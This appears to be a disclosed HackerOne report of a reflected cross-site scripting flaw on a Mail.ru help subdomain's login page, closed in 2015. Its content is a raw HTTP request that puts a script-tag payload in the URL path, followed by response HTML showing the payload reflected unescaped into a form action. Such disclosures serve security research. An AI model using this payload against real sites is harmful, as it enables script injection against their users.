ReportLink:https://hackerone.com/reports/65921
WeaknessName:Cross-site Scripting (XSS) - Generic
Reporter:https://hackerone.com/isox
ReportedTo:Mail.ru(mailru)
BountyAmount:
Severity:
State:Closed
DateOfDisclosure:13.09.2015 12:59:44

Summary:

GET /login/index.php/article/articleview/ALERT"><script>alert(1)</script> HTTP/1.1
Host: help2.m.smailru.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1157874958.1431696489
Connection: keep-alive

<form class="form-signin" role="form" method="POST" action="/login/index.php/article/articleview/ALERT"><script>alert(1)</script>">
        <h2 class="form-signin-heading">Please sign in</h2>